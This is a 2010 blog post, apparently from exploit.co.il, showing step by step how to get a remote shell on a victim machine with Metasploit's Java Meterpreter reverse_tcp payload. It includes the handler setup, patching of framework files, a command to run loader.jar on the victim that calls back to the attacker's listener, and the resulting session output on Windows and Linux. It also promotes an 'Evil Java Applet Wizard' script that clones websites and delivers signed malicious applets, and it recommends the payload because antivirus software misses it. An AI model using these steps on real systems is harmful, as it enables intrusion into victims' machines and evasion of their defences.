Metasploit Java Meterpreter Payload

If you haven’t noticed the Metasploit Framework has a JAVA meterpreter payload for some time now

It supports all the commands supported by the PHP meterpreter, as of SVN revision 9777, and additionally the ipconfig, route, and screenshot commands.

It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed.

In this post I will show how to set it up and use it.

Further more,  I have recreated my “Evil java applet wizard” to automate the the process of getting it up and running.

The script now supports a full java attack which includes the client side applet attack and uses the meterpreter java payload instead a binary executable.

Registered members can download the script at the end of this post (Script updated Aug 17) .

Why using a java meterpreter you ask ?

Well…you’ll see later…

Requirements:

JRE 1.2 on the victim machine is enough although some features, like routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.

You can find the java meterpreter payload jar file in:

"/pentest/exploits/framework3/data/java/loader.jar"

You will also need the “JavaMeterpreter.zip” file which you can download from HERE

I have just noticed that manual tweaking is no longer necessary the Metasploit framework now has the java meterpreter listener built in.

That means you can skip steps 1 to 4

and instead of using the patched php meterpreter you can use the java meterpreter directly.

I have also updated the script to use the java payload as well.

| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

Name  Current Setting  Required  Description
----  ---------------  --------  -----------

Payload options (java/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Wildcard Target

msf exploit(handler) >

Lets see how to set it up manually...

1. Download

root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate

2. Unzip

root@Blackbox:/tmp# unzip JavaMeterpreter.zip

3. Copy necessary files

root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter

4. Backup PHP Meterpreter files and Change jar files extensions to php (This will break PHP Meterpreter support)

root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php

5. Launch msfconsole and setup a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole
__.                       .__.        .__. __.
_____   _____/  |______    ____________ |  |   ____ |__|/  |_
/     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
\/     \/          \/     \/ |__|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)

msf > use exploit/multi/handler
smsf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...

6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to victim pc and run it as follows

C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar   []
C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444

7. Get your Meterpreter JAVA Shell…

[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010

meterpreter > sysinfo
Computer: exploit
OS      : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter >

P.S:

The java meterpreter will work for linux systems as well….

root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444
meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > rexploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010

meterpreter > sysinfo
Computer: Blackbox
OS      : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter >

I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.

The reasons for that are:

1. Antivirus software will not detect JAVA Meterpreter as a malicious file (as you can see in the demo video below).

2. It make sense to use the Java Meterpreter payload if you are already using athe JAVA Applet client side attack vector.

If it worked it means that the victim has Java installed on his system which allowes us to use this payload.

Demo:

Metasploit JAVA Meterpreter from NightRanger on Vimeo.

Script requirements are:

#!/usr/bin/python

'''
Created on Jul 4, 2010
Code Updated on Aug 17, 2010

@Author: NightRanger, http://exploit.co.il

This script designed and tested on BackTrack 4 final with metasploit v3.4.2-dev

Requirements:

JAVA JDK: Install using: "apt-get install sun-java6-jdk"
Meterpreter JAVA Payload (loader.jar) must exist in: "/pentest/exploits/framework3/data/java/loader.jar"

Script features:
----------------

- Generates java applet code on the fly
- Generates Keystore / Keystore Removal
- Compiles applet code
- Package and sings JAR file
- Web site cloning
- Generates applet html code
- Creates a meterpreter JAVA payload
- Starts apache web server
- Starts MSFConsole listener

* Java applet source code found in the wild, decompiled and tweaked.
* Website clone wget syntax taken from SET.
'''

Download the script :

The script is designed for attacking windows operating systems

jaw.tar.gz
You need to login to access to the attachmentsTitle: jaw.tar.gz (28 clicks)
Caption: Java Applet Wizard
Filename: jaw.tar.gz
Size: 4 kB

References:

https://www.metasploit.com/redmine/issues/406

http://schierlm.users.sourceforge.net/JavaPayload/

http://www.metasploit.com/modules/payload/java/meterpreter/reverse_tcp

http://seclists.org/metasploit/2010/q3/134

Post to Twitter

2 Comments


  1. LowValueTarget
    Aug 16, 2010

    Good Stuff!

  2. [...] Metasploit Java Meterpreter Payload – exploit.co.il It is not fully implemented into the framework yet and in order to get it up and running some manual tweaking is needed. [...]

Recent Posts